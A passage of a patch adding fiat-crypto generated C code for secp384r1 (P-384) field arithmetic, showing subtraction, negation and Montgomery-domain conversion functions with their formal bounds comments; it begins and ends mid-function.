fiat_secp384r1_uint1 x17; ++ uint64_t x18; ++ fiat_secp384r1_uint1 x19; ++ uint64_t x20; ++ fiat_secp384r1_uint1 x21; ++ uint64_t x22; ++ fiat_secp384r1_uint1 x23; ++ uint64_t x24; ++ fiat_secp384r1_uint1 x25; ++ fiat_secp384r1_subborrowx_u64(&x1, &x2, 0x0, (arg1[0]), (arg2[0])); ++ fiat_secp384r1_subborrowx_u64(&x3, &x4, x2, (arg1[1]), (arg2[1])); ++ fiat_secp384r1_subborrowx_u64(&x5, &x6, x4, (arg1[2]), (arg2[2])); ++ fiat_secp384r1_subborrowx_u64(&x7, &x8, x6, (arg1[3]), (arg2[3])); ++ fiat_secp384r1_subborrowx_u64(&x9, &x10, x8, (arg1[4]), (arg2[4])); ++ fiat_secp384r1_subborrowx_u64(&x11, &x12, x10, (arg1[5]), (arg2[5])); ++ fiat_secp384r1_cmovznz_u64(&x13, x12, 0x0, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x14, &x15, 0x0, x1, ++ (x13 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u64(&x16, &x17, x15, x3, ++ (x13 & UINT64_C(0xffffffff00000000))); ++ fiat_secp384r1_addcarryx_u64(&x18, &x19, x17, x5, ++ (x13 & UINT64_C(0xfffffffffffffffe))); ++ fiat_secp384r1_addcarryx_u64(&x20, &x21, x19, x7, ++ (x13 & UINT64_C(0xffffffffffffffff))); ++ fiat_secp384r1_addcarryx_u64(&x22, &x23, x21, x9, ++ (x13 & UINT64_C(0xffffffffffffffff))); ++ fiat_secp384r1_addcarryx_u64(&x24, &x25, x23, x11, ++ (x13 & UINT64_C(0xffffffffffffffff))); ++ out1[0] = x14; ++ out1[1] = x16; ++ out1[2] = x18; ++ out1[3] = x20; ++ out1[4] = x22; ++ out1[5] = x24; ++} ++ ++/* ++ * The function fiat_secp384r1_opp negates a field element in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = -eval (from_montgomery arg1) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_opp(uint64_t out1[6], const uint64_t arg1[6]) ++{ ++ uint64_t x1; ++ fiat_secp384r1_uint1 x2; ++ uint64_t x3; ++ fiat_secp384r1_uint1 x4; ++ uint64_t x5; ++ fiat_secp384r1_uint1 x6; ++ uint64_t x7; ++ fiat_secp384r1_uint1 x8; ++ uint64_t x9; ++ fiat_secp384r1_uint1 x10; ++ uint64_t x11; ++ fiat_secp384r1_uint1 x12; ++ uint64_t x13; ++ uint64_t x14; ++ fiat_secp384r1_uint1 x15; ++ uint64_t x16; ++ fiat_secp384r1_uint1 x17; ++ uint64_t x18; ++ fiat_secp384r1_uint1 x19; ++ uint64_t x20; ++ fiat_secp384r1_uint1 x21; ++ uint64_t x22; ++ fiat_secp384r1_uint1 x23; ++ uint64_t x24; ++ fiat_secp384r1_uint1 x25; ++ fiat_secp384r1_subborrowx_u64(&x1, &x2, 0x0, 0x0, (arg1[0])); ++ fiat_secp384r1_subborrowx_u64(&x3, &x4, x2, 0x0, (arg1[1])); ++ fiat_secp384r1_subborrowx_u64(&x5, &x6, x4, 0x0, (arg1[2])); ++ fiat_secp384r1_subborrowx_u64(&x7, &x8, x6, 0x0, (arg1[3])); ++ fiat_secp384r1_subborrowx_u64(&x9, &x10, x8, 0x0, (arg1[4])); ++ fiat_secp384r1_subborrowx_u64(&x11, &x12, x10, 0x0, (arg1[5])); ++ fiat_secp384r1_cmovznz_u64(&x13, x12, 0x0, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x14, &x15, 0x0, x1, ++ (x13 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u64(&x16, &x17, x15, x3, ++ (x13 & UINT64_C(0xffffffff00000000))); ++ fiat_secp384r1_addcarryx_u64(&x18, &x19, x17, x5, ++ (x13 & UINT64_C(0xfffffffffffffffe))); ++ fiat_secp384r1_addcarryx_u64(&x20, &x21, x19, x7, ++ (x13 & UINT64_C(0xffffffffffffffff))); ++ fiat_secp384r1_addcarryx_u64(&x22, &x23, x21, x9, ++ (x13 & UINT64_C(0xffffffffffffffff))); ++ fiat_secp384r1_addcarryx_u64(&x24, &x25, x23, x11, ++ (x13 & UINT64_C(0xffffffffffffffff))); ++ out1[0] = x14; ++ out1[1] = x16; ++ out1[2] = x18; ++ out1[3] = x20; ++ out1[4] = x22; ++ out1[5] = x24; ++} ++ ++/* ++ * The function fiat_secp384r1_from_montgomery translates a field element out of the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval out1 mod m = (eval arg1 * ((2^64)⁻¹ mod m)^6) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_from_montgomery(uint64_t out1[6], ++ const uint64_t arg1[6]) ++{ ++ uint64_t x1; ++ uint64_t x2; ++ uint64_t x3; ++ uint64_t x4; ++ uint64_t x5; ++ uint64_t x6; ++ uint64_t x7; ++ uint64_t x8; ++ uint64_t x9; ++ uint64_t x10; ++ uint64_t x11; ++ uint64_t x12; ++ uint64_t x13; ++ uint64_t x14; ++ uint64_t x15; ++ uint64_t x16; ++ fiat_secp384r1_uint1 x17; ++ uint64_t x18; ++ fiat_secp384r1_uint1 x19; ++ uint64_t x20; ++ fiat_secp384r1_uint1 x21; ++ uint64_t x22; ++ fiat_secp384r1_uint1 x23; ++ uint64_t x24; ++ fiat_secp384r1_uint1 x25; ++ uint64_t x26; ++ fiat_secp384r1_uint1 x27; ++ uint64_t x28; ++ fiat_secp384r1_uint1 x29; ++ uint64_t x30; ++ fiat_secp384r1_uint1 x31; ++ uint64_t x32; ++ fiat_secp384r1_uint1 x33; ++ uint64_t x34; ++ fiat_secp384r1_uint1 x35; ++ uint64_t x36; ++ fiat_secp384r1_uint1 x37; ++ uint64_t x38; ++ fiat_secp384r1_uint1 x39; ++ uint64_t x40; ++ fiat_secp384r1_uint1 x41; ++ uint64_t x42; ++ fiat_secp384r1_uint1 x43; ++ uint64_t x44; ++ fiat_secp384r1_uint1 x45; ++ uint64_t x46; ++ fiat_secp384r1_uint1 x47; ++ uint64_t x48; ++ fiat_secp384r1_uint1 x49; ++ uint64_t x50; ++ fiat_secp384r1_uint1 x51; ++ uint64_t x52; ++ uint64_t x53; ++ uint64_t x54; ++ uint64_t x55; ++ uint64_t x56; ++ uint64_t x57; ++ uint64_t x58; ++ uint64_t x59; ++ uint64_t x60; ++ uint64_t x61; ++ uint64_t x62; ++ uint64_t x63; ++ uint64_t x64; ++ uint64_t x65; ++ uint64_t x66; ++ fiat_secp384r1_uint1 x67; ++ uint64_t x68; ++ fiat_secp384r1_uint1 x69; ++ uint64_t x70; ++ fiat_secp384r1_uint1 x71; ++ uint64_t x72; ++ fiat_secp384r1_uint1 x73; ++ uint64_t x74; ++ fiat_secp384r1_uint1 x75; ++ uint64_t x76; ++ fiat_secp384r1_uint1 x77; ++ uint64_t x78; ++ fiat_secp384r1_uint1 x79; ++ uint64_t x80; ++ fiat_secp384r1_uint1 x81; ++ uint64_t x82; ++ fiat_secp384r1_uint1 x83; ++ uint64_t x84; ++ fiat_secp384r1_uint1 x85; ++ uint64_t x86; ++ fiat_secp384r1_uint1 x87; ++ uint64_t x88; ++ fiat_secp384r1_uint1 x89; ++ uint64_t x90; ++ fiat_secp384r1_uint1 x91; ++ uint64_t x92; ++ fiat_secp384r1_uint1 x93; ++ uint64_t x94; ++ fiat_secp384r1_uint1 x95; ++ uint64_t x96; ++ fiat_secp384r1_uint1 x97; ++ uint64_t x98; ++ fiat_secp384r1_uint1 x99; ++ uint64_t x100; ++ fiat_secp384r1_uint1 x101; ++ uint64_t x102; ++ uint64_t x103; ++ uint64_t x104; ++ uint64_t x105; ++ uint64_t x106; ++ uint64_t x107; ++ uint64_t x108; ++ uint64_t x109; ++ uint64_t x110; ++ uint64_t x111; ++ uint64_t x112; ++ uint64_t x113; ++ uint64_t x114; ++ uint64_t x115; ++ uint64_t x116; ++ fiat_secp384r1_uint1 x117; ++ uint64_t x118; ++ fiat_secp384r1_uint1 x119; ++ uint64_t x120; ++ fiat_secp384r1_uint1 x121; ++ uint64_t x122; ++ fiat_secp384r1_uint1 x123; ++ uint64_t x124; ++ fiat_secp384r1_uint1 x125; ++ uint64_t x126; ++ fiat_secp384r1_uint1 x127; ++ uint64_t x128; ++ fiat_secp384r1_uint1 x129; ++ uint64_t x130; ++ fiat_secp384r1_uint1 x131; ++ uint64_t x132; ++ fiat_secp384r1_uint1 x133; ++ uint64_t x134; ++ fiat_secp384r1_uint1 x135; ++ uint64_t x136; ++ fiat_secp384r1_uint1 x137; ++ uint64_t x138; ++ fiat_secp384r1_uint1 x139; ++ uint64_t x140; ++ fiat_secp384r1_uint1 x141; ++ uint64_t x142; ++ fiat_secp384r1_uint1 x143; ++ uint64_t x144; ++ fiat_secp384r1_uint1 x145; ++ uint64_t x146; ++ fiat_secp384r1_uint1 x147; ++ uint64_t x148; ++ fiat_secp384r1_uint1 x149; ++ uint64_t x150; ++ fiat_secp384r1_uint1 x151; ++ uint64_t x152; ++ uint64_t x153; ++ uint64_t x154; ++ uint64_t x155; ++ uint64_t x156; ++ uint64_t x157; ++ uint64_t x158; ++ uint64_t x159; ++ uint64_t x160; ++ uint64_t x161; ++ uint64_t x162; ++ uint64_t x163; ++ uint64_t x164; ++ uint64_t x165; ++ uint64_t x166; ++ fiat_secp384r1_uint1 x167; ++ uint64_t x168; ++ fiat_secp384r1_uint1 x169; ++ uint64_t x170; ++ fiat_secp384r1_uint1 x171; ++ uint64_t x172; ++ fiat_secp384r1_uint1 x173; ++ uint64_t x174; ++ fiat_secp384r1_uint1 x175; ++ uint64_t x176; ++ fiat_secp384r1_uint1 x177; ++ uint64_t x178; ++ fiat_secp384r1_uint1 x179; ++ uint64_t x180; ++ fiat_secp384r1_uint1 x181; ++ uint64_t x182; ++ fiat_secp384r1_uint1 x183; ++ uint64_t x184; ++ fiat_secp384r1_uint1 x185; ++ uint64_t x186; ++ fiat_secp384r1_uint1 x187; ++ uint64_t x188; ++ fiat_secp384r1_uint1 x189; ++ uint64_t x190; ++ fiat_secp384r1_uint1 x191; ++ uint64_t x192; ++ fiat_secp384r1_uint1 x193; ++ uint64_t x194; ++ fiat_secp384r1_uint1 x195; ++ uint64_t x196; ++ fiat_secp384r1_uint1 x197; ++ uint64_t x198; ++ fiat_secp384r1_uint1 x199; ++ uint64_t x200; ++ fiat_secp384r1_uint1 x201; ++ uint64_t x202; ++ uint64_t x203; ++ uint64_t x204; ++ uint64_t x205; ++ uint64_t x206; ++ uint64_t x207; ++ uint64_t x208; ++ uint64_t x209; ++ uint64_t x210; ++ uint64_t x211; ++ uint64_t x212; ++ uint64_t x213; ++ uint64_t x214; ++ uint64_t x215; ++ uint64_t x216; ++ fiat_secp384r1_uint1 x217; ++ uint64_t x218; ++ fiat_secp384r1_uint1 x219; ++ uint64_t x220; ++ fiat_secp384r1_uint1 x221; ++ uint64_t x222; ++ fiat_secp384r1_uint1 x223; ++ uint64_t x224; ++ fiat_secp384r1_uint1 x225; ++ uint64_t x226; ++ fiat_secp384r1_uint1 x227; ++ uint64_t x228; ++ fiat_secp384r1_uint1 x229; ++ uint64_t x230; ++ fiat_secp384r1_uint1 x231; ++ uint64_t x232; ++ fiat_secp384r1_uint1 x233; ++ uint64_t x234; ++ fiat_secp384r1_uint1 x235; ++ uint64_t x236; ++ fiat_secp384r1_uint1 x237; ++ uint64_t x238; ++ fiat_secp384r1_uint1 x239; ++ uint64_t x240; ++ fiat_secp384r1_uint1 x241; ++ uint64_t x242; ++ fiat_secp384r1_uint1 x243; ++ uint64_t x244; ++ fiat_secp384r1_uint1 x245; ++ uint64_t x246; ++ fiat_secp384r1_uint1 x247; ++ uint64_t x248; ++ fiat_secp384r1_uint1 x249; ++ uint64_t x250; ++ fiat_secp384r1_uint1 x251; ++ uint64_t x252; ++ uint64_t x253; ++ uint64_t x254; ++ uint64_t x255; ++ uint64_t x256; ++ uint64_t x257; ++ uint64_t x258; ++ uint64_t x259; ++ uint64_t x260; ++ uint64_t x261; ++ uint64_t x262; ++ uint64_t x263; ++ uint64_t x264; ++ uint64_t x265; ++ uint64_t x266; ++ fiat_secp384r1_uint1 x267; ++ uint64_t x268; ++ fiat_secp384r1_uint1 x269; ++ uint64_t x270; ++ fiat_secp384r1_uint1 x271; ++ uint64_t x272; ++ fiat_secp384r1_uint1 x273; ++ uint64_t x274; ++ fiat_secp384r1_uint1 x275; ++ uint64_t x276; ++ fiat_secp384r1_uint1 x277; ++ uint64_t x278; ++ fiat_secp384r1_uint1 x279; ++ uint64_t x280; ++ fiat_secp384r1_uint1 x281; ++ uint64_t x282; ++ fiat_secp384r1_uint1 x283; ++ uint64_t x284; ++ fiat_secp384r1_uint1 x285; ++ uint64_t x286; ++ fiat_secp384r1_uint1 x287; ++ uint64_t x288; ++ fiat_secp384r1_uint1 x289; ++ uint64_t x290; ++ fiat_secp384r1_uint1 x291; ++ uint64_t x292; ++ fiat_secp384r1_uint1 x293; ++ uint64_t x294; ++ fiat_secp384r1_uint1 x295; ++ uint64_t x296; ++ fiat_secp384r1_uint1 x297; ++ uint64_t x298; ++ fiat_secp384r1_uint1 x299; ++ uint64_t x300; ++ fiat_secp384r1_uint1 x301; ++ uint64_t x302; ++ fiat_secp384r1_uint1 x303; ++ uint64_t x304; ++ uint64_t x305; ++ uint64_t x306; ++ uint64_t x307; ++ uint64_t x308; ++ uint64_t x309; ++ x1 = (arg1[0]); ++ fiat_secp384r1_mulx_u64(&x2, &x3, x1, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x4, &x5, x2, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x6, &x7, x2, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x8, &x9, x2, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x10, &x11, x2, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x12, &x13, x2, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x14, &x15, x2, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x16, &x17, 0x0, x15, x12); ++ fiat_secp384r1_addcarryx_u64(&x18, &x19, x17, x13, x10); ++ fiat_secp384r1_addcarryx_u64(&x20, &x21, x19, x11, x8); ++ fiat_secp384r1_addcarryx_u64(&x22, &x23, x21, x9, x6); ++ fiat_secp384r1_addcarryx_u64(&x24, &x25, x23, x7, x4); ++ fiat_secp384r1_addcarryx_u64(&x26, &x27, 0x0, x1, x14); ++ fiat_secp384r1_addcarryx_u64(&x28, &x29, x27, 0x0, x16); ++ fiat_secp384r1_addcarryx_u64(&x30, &x31, x29, 0x0, x18); ++ fiat_secp384r1_addcarryx_u64(&x32, &x33, x31, 0x0, x20); ++ fiat_secp384r1_addcarryx_u64(&x34, &x35, x33, 0x0, x22); ++ fiat_secp384r1_addcarryx_u64(&x36, &x37, x35, 0x0, x24); ++ fiat_secp384r1_addcarryx_u64(&x38, &x39, x37, 0x0, (x25 + x5)); ++ fiat_secp384r1_addcarryx_u64(&x40, &x41, 0x0, x28, (arg1[1])); ++ fiat_secp384r1_addcarryx_u64(&x42, &x43, x41, x30, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x44, &x45, x43, x32, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x46, &x47, x45, x34, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x48, &x49, x47, x36, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x50, &x51, x49, x38, 0x0); ++ fiat_secp384r1_mulx_u64(&x52, &x53, x40, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x54, &x55, x52, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x56, &x57, x52, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x58, &x59, x52, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x60, &x61, x52, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x62, &x63, x52, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x64, &x65, x52, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x66, &x67, 0x0, x65, x62); ++ fiat_secp384r1_addcarryx_u64(&x68, &x69, x67, x63, x60); ++ fiat_secp384r1_addcarryx_u64(&x70, &x71, x69, x61, x58); ++ fiat_secp384r1_addcarryx_u64(&x72, &x73, x71, x59, x56); ++ fiat_secp384r1_addcarryx_u64(&x74, &x75, x73, x57, x54); ++ fiat_secp384r1_addcarryx_u64(&x76, &x77, 0x0, x40, x64); ++ fiat_secp384r1_addcarryx_u64(&x78, &x79, x77, x42, x66); ++ fiat_secp384r1_addcarryx_u64(&x80, &x81, x79, x44, x68); ++ fiat_secp384r1_addcarryx_u64(&x82, &x83, x81, x46, x70); ++ fiat_secp384r1_addcarryx_u64(&x84, &x85, x83, x48, x72); ++ fiat_secp384r1_addcarryx_u64(&x86, &x87, x85, x50, x74); ++ fiat_secp384r1_addcarryx_u64(&x88, &x89, x87, ((uint64_t)x51 + x39), ++ (x75 + x55)); ++ fiat_secp384r1_addcarryx_u64(&x90, &x91, 0x0, x78, (arg1[2])); ++ fiat_secp384r1_addcarryx_u64(&x92, &x93, x91, x80, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x94, &x95, x93, x82, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x96, &x97, x95, x84, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x98, &x99, x97, x86, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x100, &x101, x99, x88, 0x0); ++ fiat_secp384r1_mulx_u64(&x102, &x103, x90, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x104, &x105, x102, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x106, &x107, x102, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x108, &x109, x102, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x110, &x111, x102, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x112, &x113, x102, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x114, &x115, x102, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x116, &x117, 0x0, x115, x112); ++ fiat_secp384r1_addcarryx_u64(&x118, &x119, x117, x113, x110); ++ fiat_secp384r1_addcarryx_u64(&x120, &x121, x119, x111, x108); ++ fiat_secp384r1_addcarryx_u64(&x122, &x123, x121, x109, x106); ++ fiat_secp384r1_addcarryx_u64(&x124, &x125, x123, x107, x104); ++ fiat_secp384r1_addcarryx_u64(&x126, &x127, 0x0, x90, x114); ++ fiat_secp384r1_addcarryx_u64(&x128, &x129, x127, x92, x116); ++ fiat_secp384r1_addcarryx_u64(&x130, &x131, x129, x94, x118); ++ fiat_secp384r1_addcarryx_u64(&x132, &x133, x131, x96, x120); ++ fiat_secp384r1_addcarryx_u64(&x134, &x135, x133, x98, x122); ++ fiat_secp384r1_addcarryx_u64(&x136, &x137, x135, x100, x124); ++ fiat_secp384r1_addcarryx_u64(&x138, &x139, x137, ((uint64_t)x101 + x89), ++ (x125 + x105)); ++ fiat_secp384r1_addcarryx_u64(&x140, &x141, 0x0, x128, (arg1[3])); ++ fiat_secp384r1_addcarryx_u64(&x142, &x143, x141, x130, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x144, &x145, x143, x132, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x146, &x147, x145, x134, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x148, &x149, x147, x136, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x150, &x151, x149, x138, 0x0); ++ fiat_secp384r1_mulx_u64(&x152, &x153, x140, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x154, &x155, x152, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x156, &x157, x152, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x158, &x159, x152, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x160, &x161, x152, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x162, &x163, x152, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x164, &x165, x152, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x166, &x167, 0x0, x165, x162); ++ fiat_secp384r1_addcarryx_u64(&x168, &x169, x167, x163, x160); ++ fiat_secp384r1_addcarryx_u64(&x170, &x171, x169, x161, x158); ++ fiat_secp384r1_addcarryx_u64(&x172, &x173, x171, x159, x156); ++ fiat_secp384r1_addcarryx_u64(&x174, &x175, x173, x157, x154); ++ fiat_secp384r1_addcarryx_u64(&x176, &x177, 0x0, x140, x164); ++ fiat_secp384r1_addcarryx_u64(&x178, &x179, x177, x142, x166); ++ fiat_secp384r1_addcarryx_u64(&x180, &x181, x179, x144, x168); ++ fiat_secp384r1_addcarryx_u64(&x182, &x183, x181, x146, x170); ++ fiat_secp384r1_addcarryx_u64(&x184, &x185, x183, x148, x172); ++ fiat_secp384r1_addcarryx_u64(&x186, &x187, x185, x150, x174); ++ fiat_secp384r1_addcarryx_u64(&x188, &x189, x187, ((uint64_t)x151 + x139), ++ (x175 + x155)); ++ fiat_secp384r1_addcarryx_u64(&x190, &x191, 0x0, x178, (arg1[4])); ++ fiat_secp384r1_addcarryx_u64(&x192, &x193, x191, x180, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x194, &x195, x193, x182, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x196, &x197, x195, x184, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x198, &x199, x197, x186, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x200, &x201, x199, x188, 0x0); ++ fiat_secp384r1_mulx_u64(&x202, &x203, x190, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x204, &x205, x202, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x206, &x207, x202, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x208, &x209, x202, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x210, &x211, x202, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x212, &x213, x202, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x214, &x215, x202, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x216, &x217, 0x0, x215, x212); ++ fiat_secp384r1_addcarryx_u64(&x218, &x219, x217, x213, x210); ++ fiat_secp384r1_addcarryx_u64(&x220, &x221, x219, x211, x208); ++ fiat_secp384r1_addcarryx_u64(&x222, &x223, x221, x209, x206); ++ fiat_secp384r1_addcarryx_u64(&x224, &x225, x223, x207, x204); ++ fiat_secp384r1_addcarryx_u64(&x226, &x227, 0x0, x190, x214); ++ fiat_secp384r1_addcarryx_u64(&x228, &x229, x227, x192, x216); ++ fiat_secp384r1_addcarryx_u64(&x230, &x231, x229, x194, x218); ++ fiat_secp384r1_addcarryx_u64(&x232, &x233, x231, x196, x220); ++ fiat_secp384r1_addcarryx_u64(&x234, &x235, x233, x198, x222); ++ fiat_secp384r1_addcarryx_u64(&x236, &x237, x235, x200, x224); ++ fiat_secp384r1_addcarryx_u64(&x238, &x239, x237, ((uint64_t)x201 + x189), ++ (x225 + x205)); ++ fiat_secp384r1_addcarryx_u64(&x240, &x241, 0x0, x228, (arg1[5])); ++ fiat_secp384r1_addcarryx_u64(&x242, &x243, x241, x230, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x244, &x245, x243, x232, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x246, &x247, x245, x234, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x248, &x249, x247, x236, 0x0); ++ fiat_secp384r1_addcarryx_u64(&x250, &x251, x249, x238, 0x0); ++ fiat_secp384r1_mulx_u64(&x252, &x253, x240, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x254, &x255, x252, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x256, &x257, x252, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x258, &x259, x252, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x260, &x261, x252, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x262, &x263, x252, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x264, &x265, x252, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x266, &x267, 0x0, x265, x262); ++ fiat_secp384r1_addcarryx_u64(&x268, &x269, x267, x263, x260); ++ fiat_secp384r1_addcarryx_u64(&x270, &x271, x269, x261, x258); ++ fiat_secp384r1_addcarryx_u64(&x272, &x273, x271, x259, x256); ++ fiat_secp384r1_addcarryx_u64(&x274, &x275, x273, x257, x254); ++ fiat_secp384r1_addcarryx_u64(&x276, &x277, 0x0, x240, x264); ++ fiat_secp384r1_addcarryx_u64(&x278, &x279, x277, x242, x266); ++ fiat_secp384r1_addcarryx_u64(&x280, &x281, x279, x244, x268); ++ fiat_secp384r1_addcarryx_u64(&x282, &x283, x281, x246, x270); ++ fiat_secp384r1_addcarryx_u64(&x284, &x285, x283, x248, x272); ++ fiat_secp384r1_addcarryx_u64(&x286, &x287, x285, x250, x274); ++ fiat_secp384r1_addcarryx_u64(&x288, &x289, x287, ((uint64_t)x251 + x239), ++ (x275 + x255)); ++ fiat_secp384r1_subborrowx_u64(&x290, &x291, 0x0, x278, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x292, &x293, x291, x280, ++ UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_subborrowx_u64(&x294, &x295, x293, x282, ++ UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_subborrowx_u64(&x296, &x297, x295, x284, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x298, &x299, x297, x286, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x300, &x301, x299, x288, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x302, &x303, x301, x289, 0x0); ++ fiat_secp384r1_cmovznz_u64(&x304, x303, x290, x278); ++ fiat_secp384r1_cmovznz_u64(&x305, x303, x292, x280); ++ fiat_secp384r1_cmovznz_u64(&x306, x303, x294, x282); ++ fiat_secp384r1_cmovznz_u64(&x307, x303, x296, x284); ++ fiat_secp384r1_cmovznz_u64(&x308, x303, x298, x286); ++ fiat_secp384r1_cmovznz_u64(&x309, x303, x300, x288); ++ out1[0] = x304; ++ out1[1] = x305; ++ out1[2] = x306; ++ out1[3] = x307; ++ out1[4] = x308; ++ out1[5] = x309; ++} ++ ++/* ++ * The function fiat_secp384r1_to_montgomery translates a field element into the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = eval arg1 mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_to_montgomery(uint64_t out1[6], ++ const uint64_t arg1[6]) ++{ ++ uint64_t x1; ++ uint64_t x2; ++ uint64_t x3; ++ uint64_t x4; ++ uint64_t x5; ++ uint64_t x6; ++ uint64_t x7; ++ uint64_t x8; ++ uint64_t x9; ++ uint64_t x10; ++ uint64_t x11; ++ uint64_t x12; ++ 